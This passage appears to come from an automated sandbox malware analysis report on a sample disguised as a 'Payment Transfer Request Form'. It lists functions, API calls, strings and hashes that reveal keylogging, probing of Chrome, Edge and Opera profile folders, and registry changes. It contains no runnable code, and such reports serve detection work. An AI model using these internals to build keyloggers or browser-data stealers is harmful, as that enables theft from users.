                                              • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                              Function 00418CCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: alarm.wav$x(G
                                              • API String ID: 1174141254-2413638199
                                              • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                              • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                              • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                              • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                              Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • CloseHandle.KERNEL32(?), ref: 00409FFD
                                              • UnhookWindowsHookEx.USER32 ref: 0040A010
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                              • String ID: Online Keylogger Stopped
                                              • API String ID: 1623830855-1496645233
                                              • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                              • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                              • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                              • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                              Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                              • API String ID: 1174141254-2800177040
                                              • Opcode ID: 200434b00567c705a4ec0a270c708b4aa76ad6954a3f043ed238abe1da8ba248
                                              • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                              • Opcode Fuzzy Hash: 200434b00567c705a4ec0a270c708b4aa76ad6954a3f043ed238abe1da8ba248
                                              • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                              Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                              • API String ID: 1174141254-4188645398
                                              • Opcode ID: 193e4a0aa2e06cf31c08a4dbc3c584a06e36efb5f13c49c06d899c900d91791a
                                              • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                              • Opcode Fuzzy Hash: 193e4a0aa2e06cf31c08a4dbc3c584a06e36efb5f13c49c06d899c900d91791a
                                              • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                              Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: AppData$\Opera Software\Opera Stable\
                                              • API String ID: 1174141254-1629609700
                                              • Opcode ID: e4ae74f1faaf2e31d842f90866caaae65dad7ba321bab3a18d5cfcc659dd894d
                                              • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                              • Opcode Fuzzy Hash: e4ae74f1faaf2e31d842f90866caaae65dad7ba321bab3a18d5cfcc659dd894d
                                              • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                              Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyState.USER32(00000011), ref: 0040A597
                                                • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                                                • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                                • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                                • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                              • String ID: [AltL]$[AltR]
                                              • API String ID: 3195419117-2658077756
                                              • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                              • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                              • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                              • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                              Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyState.USER32(00000012), ref: 0040A5F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State
                                              • String ID: [CtrlL]$[CtrlR]
                                              • API String ID: 1649606143-2446555240
                                              • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                              • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                              • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                              • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                              Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteOpenValue
                                              • String ID: 6h@
                                              • API String ID: 2654517830-73392143
                                              • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                              • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                              • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                              • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                              Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                              • GetLastError.KERNEL32 ref: 0043B4E9
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast
                                              • String ID:
                                              • API String ID: 1717984340-0
                                              • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                              • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                              • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                              • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                              Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                              • SetLastError.KERNEL32(0000007F), ref: 004106DF
                                              • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastRead
                                              • String ID:
                                              • API String ID: 4100373531-0
                                              • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                              • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                              • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                              • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19

                                              Execution Graph

                                              Execution Coverage:8.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:90
                                              Total number of Limit Nodes:3
                                              execution_graph 22253 16b4668 22254 16b4672 22253->22254 22256 16b4758 22253->22256 22257 16b477d 22256->22257 22261 16b4868 22257->22261 22265 16b4858 22257->22265 22262 16b488f 22261->22262 22263 16b496c 22262->22263 22269 16b44b4 22262->22269 22266 16b4868 22265->22266 22267 16b44b4 CreateActCtxA 22266->22267 22268 16b496c 22266->22268 22267->22268 22270 16b58f8 CreateActCtxA 22269->22270 22272 16b59bb 22270->22272 22272->22272 22273 7539cf8 22274 7539d16 22273->22274 22275 7539d20 22273->22275 22278 7539d60 22274->22278 22283 7539d4b 22274->22283 22279 7539d6e 22278->22279 22282 7539d8d 22278->22282 22287 75392b4 22279->22287 22282->22275 22284 7539d56 22283->22284 22285 75392b4 CloseHandle 22284->22285 22286 7539d89 22285->22286 22286->22275 22288 7539ed8 CloseHandle 22287->22288 22289 7539d89 22288->22289 22289->22275 22290 16bcfa0 22291 16bcfe6 22290->22291 22295 16bd578 22291->22295 22298 16bd588 22291->22298 22292 16bd0d3 22301 16bd1dc 22295->22301 22299 16bd1dc DuplicateHandle 22298->22299 22300 16bd5b6 22298->22300 22299->22300 22300->22292 22302 16bd5f0 DuplicateHandle 22301->22302 22303 16bd5b6 22302->22303 22303->22292 22304 16bac10 22305 16bac1f 22304->22305 22308 16bacf9 22304->22308 22318 16bad08 22304->22318 22309 16bad08 22308->22309 22312 16bad3c 22309->22312 22328 16ba02c 22309->22328 22312->22305 22313 16bad34 22313->22312 22314 16baf40 GetModuleHandleW 22313->22314 22315 16baf6d 22314->22315 22315->22305 22319 16bad19 22318->22319 22322 16bad3c 22318->22322 22320 16ba02c GetModuleHandleW 22319->22320 22321 16bad24 22320->22321 22321->22322 22326 16bafa0 GetModuleHandleW 22321->22326 22327 16baf90 GetModuleHandleW 22321->22327 22322->22305 22323 16bad34 22323->22322 22324 16baf40 GetModuleHandleW 22323->22324 22325 16baf6d 22324->22325 22325->22305 22326->22323 22327->22323 22329 16baef8 GetModuleHandleW 22328->22329 22331 16bad24 22329->22331 22331->22312 22332 16baf90 22331->22332 22336 16bafa0 22331->22336 22333 16bafa0 22332->22333 22334 16ba02c GetModuleHandleW 22333->22334 22335 16bafb4 22334->22335 22335->22313 22337 16ba02c GetModuleHandleW 22336->22337 22338 16bafb4 22337->22338 22338->22313 22339 753804c 22340 753809c 22339->22340 22344 75383d0 22340->22344 22349 75383ce 22340->22349 22341 75380a9 22341->22341 22345 75383e0 22344->22345 22354 75383fa 22345->22354 22358 7538408 22345->22358 22346 75383ef 22346->22341 22350 75383e0 22349->22350 22352 75383fa PostMessageW 22350->22352 22353 7538408 PostMessageW 22350->22353 22351 75383ef 22351->22341 22352->22351 22353->22351 22355 753842c 22354->22355 22356 7538454 22355->22356 22362 7538512 22355->22362 22356->22346 22359 753842c 22358->22359 22360 7538454 22359->22360 22361 7538512 PostMessageW 22359->22361 22360->22346 22361->22360 22364 7538471 22362->22364 22365 753851a 22362->22365 22363 75386ab 22363->22356 22364->22356 22365->22363 22367 7534360 22365->22367 22368 75387a0 PostMessageW 22367->22368 22369 753880c 22368->22369 22369->22365

                                              Executed Functions

                                              Function 016BAD08 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 1bde34d5d564a2af4c404ac862ff1a46a930f2ae562b51c6b39c42967e1ce502
                                              • Instruction ID: de30a046f503927a742ee1eda0c484a5efbe39bdf1980f404c78c47cc84737b4
                                              • Opcode Fuzzy Hash: 1bde34d5d564a2af4c404ac862ff1a46a930f2ae562b51c6b39c42967e1ce502
                                              • Instruction Fuzzy Hash: 36713970A00B058FE724DF69D48479ABBF5FF48204F108A2DD49AD7B50DB75E889CB91
                                              Function 016B58EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 60 16b58ec-16b58f3 61 16b58f8-16b59b9 CreateActCtxA 60->61 63 16b59bb-16b59c1 61->63 64 16b59c2-16b5a1c 61->64 63->64 71 16b5a2b-16b5a2f 64->71 72 16b5a1e-16b5a21 64->72 73 16b5a31-16b5a3d 71->73 74 16b5a40 71->74 72->71 73->74 76 16b5a41 74->76 76->76
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016B59A9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 4a4e46910324f112cb8bf751db7f4956b7ef0860f3330972fd25174243d74295
                                              • Instruction ID: 42b8afc42b9345323afec065fb73d1595a521c9763cb0a35e9f2a4830ab11d09
                                              • Opcode Fuzzy Hash: 4a4e46910324f112cb8bf751db7f4956b7ef0860f3330972fd25174243d74295
                                              • Instruction Fuzzy Hash: E041BF70C00759CFDB24DFAAC884BDEBBB5BF49704F20806AD509AB251DB756945CF90
                                              Function 016B44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 77 16b44b4-16b59b9 CreateActCtxA 80 16b59bb-16b59c1 77->80 81 16b59c2-16b5a1c 77->81 80->81 88 16b5a2b-16b5a2f 81->88 89 16b5a1e-16b5a21 81->89 90 16b5a31-16b5a3d 88->90 91 16b5a40 88->91 89->88 90->91 93 16b5a41 91->93 93->93
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016B59A9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: a5e033cad0422615106dd56f2761292eeb4dcec73ef919d3d0a1ccfb2306d2ed
                                              • Instruction ID: f2b2b74318e97e480fcb72f0acefcfaccc4becccb08602b0ac622f646ad0ba9d
                                              • Opcode Fuzzy Hash: a5e033cad0422615106dd56f2761292eeb4dcec73ef919d3d0a1ccfb2306d2ed
                                              • Instruction Fuzzy Hash: 2941BFB0C00769CBDB24DFAAC884BDEFBB5BF49704F20806AD509AB251DB756945CF90
                                              Function 016BD1DC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 94 16bd1dc-16bd684 DuplicateHandle 96 16bd68d-16bd6aa 94->96 97 16bd686-16bd68c 94->97 97->96
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016BD5B6,?,?,?,?,?), ref: 016BD677
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 10f7dc9cbbca23717886377fd5f02d8a0936c1e1a9097a42180338f9a20c7c65
                                              • Instruction ID: 7a7ae8393f4ff8db156c413249eccdf95c9fae10f9443663d2e75d02fabfd29a
                                              • Opcode Fuzzy Hash: 10f7dc9cbbca23717886377fd5f02d8a0936c1e1a9097a42180338f9a20c7c65
                                              • Instruction Fuzzy Hash: 7421E5B5900259AFDB10CF9AD984ADEBBF4EB48314F14841AE918A7350D374A950CFA4
                                              Function 016BD5E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 100 16bd5e8-16bd5eb 101 16bd5f0-16bd684 DuplicateHandle 100->101 102 16bd68d-16bd6aa 101->102 103 16bd686-16bd68c 101->103 103->102
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016BD5B6,?,?,?,?,?), ref: 016BD677
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: b1e2e694401ac1a87faf36b2213acd8ebb4fc0bb4e93bc8cea14616b092c6947
                                              • Instruction ID: a88173463f1a4ff05bf1f0f79331ad724f44ce6de1843afec48d4acc0372d052
                                              • Opcode Fuzzy Hash: b1e2e694401ac1a87faf36b2213acd8ebb4fc0bb4e93bc8cea14616b092c6947
                                              • Instruction Fuzzy Hash: 1E21E4B5900259EFDB10CF9AD984ADEFBF9FB48314F14801AE958A7350D378A940CFA4
                                              Function 016BA02C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 106 16ba02c-16baf38 108 16baf3a-16baf3d 106->108 109 16baf40-16baf6b GetModuleHandleW 106->109 108->109 110 16baf6d-16baf73 109->110 111 16baf74-16baf88 109->111 110->111
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016BAD24), ref: 016BAF5E
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1440635253.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_16b0000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: d5f30d4978dda892145e85215c882b88595914136780722e66faaf84c7071a77
                                              • Instruction ID: c2b07fed3f5aef0d81871a31a843009318e6b9e5918890e0061a074ccde2333d
                                              • Opcode Fuzzy Hash: d5f30d4978dda892145e85215c882b88595914136780722e66faaf84c7071a77
                                              • Instruction Fuzzy Hash: B51132B5C003498FDB20CF9AD884BDEFBF8EB48214F10802AE518A7740D379A545CFA0
                                              Function 07534360 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 113 7534360-753880a PostMessageW 115 7538813-7538827 113->115 116 753880c-7538812 113->116 116->115
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 075387FD
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1446221745.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7530000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: fa3e437477641cde51deea7ed093aa69de8cbc74ca925d6a0ebbb9cf7ccf4a84
                                              • Instruction ID: 46a3860dfa74fb1c6579dff39cef0993578a21c32275653153277bdddd6fb84c
                                              • Opcode Fuzzy Hash: fa3e437477641cde51deea7ed093aa69de8cbc74ca925d6a0ebbb9cf7ccf4a84
                                              • Instruction Fuzzy Hash: 3111F5B58003499FDB20DF9AD484BDEFBF8FB48310F10885AE554A7650C379A944CFA5
                                              Function 0753879A Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 118 753879a-753880a PostMessageW 119 7538813-7538827 118->119 120 753880c-7538812 118->120 120->119
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 075387FD
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1446221745.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7530000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: e5731a665d121e172f944b8b2f23ac318556ca67d3795f960780cf5aabd558bd
                                              • Instruction ID: ab48adc03a8d34e4d8a22b8f6b1159be78168ecb6dca1fc7720247ac003cd5a9
                                              • Opcode Fuzzy Hash: e5731a665d121e172f944b8b2f23ac318556ca67d3795f960780cf5aabd558bd
                                              • Instruction Fuzzy Hash: 1511D3B98003499FDB20DF9AD585BDEFBF8FB48310F20881AE558A7650C379A544CFA5
                                              Function 075392B4 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 149 75392b4-7539f30 CloseHandle 151 7539f32-7539f3d 149->151 152 7539f46-7539f6e 151->152 153 7539f3f-7539f45 151->153 153->152
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07539D89,?,?), ref: 07539F30
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1446221745.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7530000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 5a8337e8c2c89225074c0e505c535d076398677e67e5304130aa1a1527343857
                                              • Instruction ID: 112321a9981a6827f858e5ddcee5ad07a4bd2f4d68d5ef92656b7238a5773531
                                              • Opcode Fuzzy Hash: 5a8337e8c2c89225074c0e505c535d076398677e67e5304130aa1a1527343857
                                              • Instruction Fuzzy Hash: 741155B18043499FCB20DF9AC484BDEBBF4FB48324F10846AE558A7740D378A944CFA4
                                              Function 07539ED0 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 156 7539ed0-7539f3d CloseHandle 159 7539f46-7539f6e 156->159 160 7539f3f-7539f45 156->160 160->159
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07539D89,?,?), ref: 07539F30
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1446221745.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_7530000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 36b2f0ed72dea88152871978034cf0735246b5227917c24443d3ad74bd2be409
                                              • Instruction ID: 15618c0cbd2357873a39bf11e824781c19760265b5796b56ff6672d44e40edd2
                                              • Opcode Fuzzy Hash: 36b2f0ed72dea88152871978034cf0735246b5227917c24443d3ad74bd2be409
                                              • Instruction Fuzzy Hash: D71155B58003499FCB20DF9AC484BDEBBF4EF48320F20845AE568A7640D378A545CFA4
                                              Function 0117D3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439614993.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_117d000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 69f667cf3744b15d7cd39b6144e2e6e7fe17c240b8c9cd9cba8b549926ceae91
                                              • Instruction ID: 80e2d46abd259107ea0809f0414cd912a86ab700be9b50bbf863d99d30cca6f6
